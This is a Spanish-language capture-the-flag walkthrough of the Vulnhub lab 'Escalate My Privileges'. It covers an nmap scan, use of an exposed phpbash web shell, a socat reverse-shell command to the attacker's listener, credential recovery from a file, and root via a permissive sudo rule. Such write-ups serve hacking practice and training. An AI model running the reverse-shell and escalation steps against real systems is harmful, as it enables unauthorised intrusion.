[VLN] Escalate My Privileges

Hoy vamos a hackear la maquina de Vulnhub llamada Escalate My Privileges: 1. Podeis descargarla desde el siguiente enlace: Escalate My Privileges

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

sml@Cassandra:~$ nmap -A -p- 192.168.1.29
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 11:58 CEST
Nmap scan report for my_privilege.home (192.168.1.29)
Host is up (0.00051s latency).
Not shown: 65526 filtered ports
PORT      STATE  SERVICE VERSION
22/tcp    open   ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 61:16:10:91:bd:d7:6c:06:df:a2:b9:b5:b9:3b:dd:b6 (RSA)
|   256 0e:a4:c9:fc:de:53:f6:1d:de:a9:de:e4:21:34:7d:1a (ECDSA)
|_  256 ec:27:1e:42:65:1c:4a:3b:93:1c:a1:75:be:00:22:0d (ED25519)
80/tcp    open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: 400 Bad Request
111/tcp   open   rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100003  3,4         2049/udp   nfs
|   100003  3,4         2049/udp6  nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      35283/tcp6  nlockmgr
|   100021  1,3,4      45561/tcp   nlockmgr
|   100021  1,3,4      46989/udp6  nlockmgr
|   100021  1,3,4      49986/udp   nlockmgr
|   100024  1          44315/tcp   status
|   100024  1          49779/udp   status
|   100024  1          50120/udp6  status
|   100024  1          56075/tcp6  status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
875/tcp   closed unknown
2049/tcp  open   nfs_acl 3 (RPC #100227)
20048/tcp open   mountd  1-3 (RPC #100005)
42955/tcp closed unknown
46666/tcp closed unknown
54302/tcp closed unknown

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.54 seconds
Si miramos el codigo fuente de la web inicial vemos: alt="http://ip/phpbash.php"> Tambien en el robots.txt podemos ver que hace mencion a phpbash.php asi que accedemos a : http://192.168.1.29/phpbash.php

Exploitation


Ya que tenemos acceso a la shell que nos facilita phpbash.php vamos a utilizarla para obtener una reverse shell. En nuestra maquina ejecutamos:

nc -nlvp 5555
En phpbash.php ejecutamos:

socat tcp-connect:192.168.1.148:5555 exec:sh,pty,stderr,setsid,sigint,sane
Y ya habremos obtenido la reverse shell. Echamos un vistazo al sistema.

sh-4.2$ cd /home
sh-4.2$ ls
armour
sh-4.2$ cd armour
sh-4.2$ ls
Credentials.txt  backup.sh  runme.sh
sh-4.2$ cat Credentials.txt
my password is
md5(rootroot1)
Vemos que el usuario armour tiene un Credentials.txt indicandonos como obtener su password.

sml@Cassandra:~$ echo -n rootroot1 | md5sum
b7bc8489abe360486b4b19dbc242e885  -
Probamos a loguearnos como armour con las credenciales obtenidas.

sh-4.2$ su armour
su armour
Password: b7bc8489abe360486b4b19dbc242e885

[armour@my_privilege ~]$ id
id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
Miramos si puede usar sudo.

[armour@my_privilege ~]$ sudo -l
sudo -l
Matching Defaults entries for armour on my_privilege:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", env_keep+=LD_PRELOAD,
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User armour may run the following commands on my_privilege:
    (ALL : ALL) NOPASSWD: /bin/sh, /bin/bash, /usr/bin/sh, /usr/bin/bash,
        /bin/tcsh, /bin/csh, /bin/ksh, /bin/rksh, /bin/zsh, /usr/bin/fish,
        /bin/dash, /usr/bin/tmux, /usr/bin/rsh, /bin/rc, /usr/bin/rc,
        /usr/bin/rssh, /usr/bin/scponly, /bin/scponly, /usr/bin/rootsh,
        /usr/bin/shc, /usr/bin/shtool, /usr/bin/targetcli, /usr/bin/nano,
        /usr/bin/rnano, /usr/bin/awk, /usr/bin/dgawk, /usr/bin/gawk,
        /usr/bin/igawk, /usr/bin/pgawk, /usr/bin/curl, /bin/ed, /bin/red,
        /usr/bin/env, /usr/bin/cat, /usr/bin/chcon, /usr/bin/chgrp,
        /usr/bin/chmod, /usr/bin/chown, /usr/bin/cp, /usr/bin/cut, /usr/bin/dd,
        /usr/bin/head, /usr/bin/ln, /usr/bin/mv, /usr/bin/nice, /usr/bin/tail,
        /usr/bin/uniq, /usr/bin/ftp, /usr/bin/pftp, /usr/bin/zip,
        /usr/bin/zipcloak, /usr/bin/zipnote, /usr/bin/zipsplit,
        /usr/bin/funzip, /usr/bin/unzip, /usr/bin/unzipsfx, /usr/bin/zipgrep,
        /usr/bin/zipinfo, /usr/bin/7za, /usr/bin/socat, /usr/bin/php,
        /usr/bin/git, /usr/bin/rvim, /usr/bin/rvim, /usr/bin/vim,
        /usr/bin/vimdiff, /usr/bin/vimtutor, /usr/bin/vi, /bin/sed,
        /usr/bin/qalc, /usr/bin/e3, /usr/bin/dex, /usr/bin/elinks,
        /usr/bin/scp, /usr/bin/sftp, /usr/bin/ssh, /usr/bin/gtar, /usr/bin/tar,
        /usr/bin/rpm, /usr/bin/up2date, /usr/bin/yum, /usr/bin/expect,
        /usr/bin/find, /usr/bin/less, /usr/bin/more, /usr/bin/perl,
        /usr/bin/python, /usr/bin/man, /usr/bin/tclsh, /usr/bin/script,
        /usr/bin/nmap, /usr/bin/nmap, /usr/bin/aria2c, /usr/sbin/arp,
        /usr/bin/base64, /usr/bin/busybox, /usr/bin/cpan, /usr/bin/cpulimit,
        /usr/bin/crontab, /usr/bin/date, /usr/bin/diff, /usr/bin/dmesg,
        /usr/sbin/dmsetup, /usr/bin/dnf, /usr/bin/docker,
        /usr/bin/easy_install, /usr/bin/emacs, /usr/bin/expand,
        /usr/bin/facter, /usr/bin/file, /usr/bin/finger, /usr/bin/flock,
        /usr/bin/fmt, /usr/bin/fold, /usr/bin/gdb, /usr/bin/gimp,
        /usr/bin/grep, /usr/bin/head, /usr/sbin/iftop, /usr/bin/ionice,
        /usr/sbin/ip, /usr/bin/irb, /usr/bin/jjs, /usr/bin/journalctl,
        /usr/bin/jq, /usr/sbin/ldconfig, /usr/sbin/logsave, /usr/bin/ltrace,
        /usr/bin/lua, /usr/bin/mail, /usr/bin/make, /usr/bin/mawk,
        /usr/bin/mount, /usr/sbin/mtr, /usr/bin/mysql, /usr/bin/nawk,
        /usr/bin/ncat, /usr/bin/nl, /usr/bin/node, /usr/bin/od,
        /usr/bin/openssl, /usr/bin/perl, /usr/bin/pic, /usr/bin/pip,
        /usr/bin/puppet, /usr/bin/readelf, /usr/bin/red, /usr/bin/rlwrap,
        /usr/bin/rpmquery, /usr/bin/rsync, /usr/bin/ruby, /usr/bin/run-parts,
        /usr/bin/screen, /usr/bin/sed, /usr/sbin/service, /usr/bin/setarch,
        /usr/bin/sftp, /usr/bin/shuf, /usr/bin/smbclient, /usr/bin/socat,
        /usr/bin/sort, /usr/bin/sqlite3, /usr/bin/stdbuf, /usr/bin/strace,
        /usr/bin/systemctl, /usr/bin/taskset, /usr/bin/tclsh,
        /usr/sbin/tcpdump, /usr/bin/tee, /usr/bin/telnet, /usr/bin/tftp,
        /usr/bin/time, /usr/bin/timeout, /usr/bin/top, /usr/bin/ul,
        /usr/bin/unexpand, /usr/bin/unshare, /usr/bin/watch, /usr/bin/wget,
        /usr/bin/xargs, /usr/bin/xxd, /script/test.sh, /script/test.py,
        /sbin/httpd, /usr/sbin/setcap, /usr/sbin/getcap, /usr/local/bin/ht,
        /bin/timedatectl, /home/armour/ai, /usr/bin/user_hello
Como vemos hay muchas (muchisimas) formas de escalar los privilegios y practicar. En este writeup vamos a ir a la sencilla :)

Privilege Escalation


Tan facil como...

[armour@my_privilege ~]$ sudo /bin/bash
[root@my_privilege armour]# id
id
uid=0(root) gid=0(root) groups=0(root)

End


Y con esto ya seriamos root de la maquina :)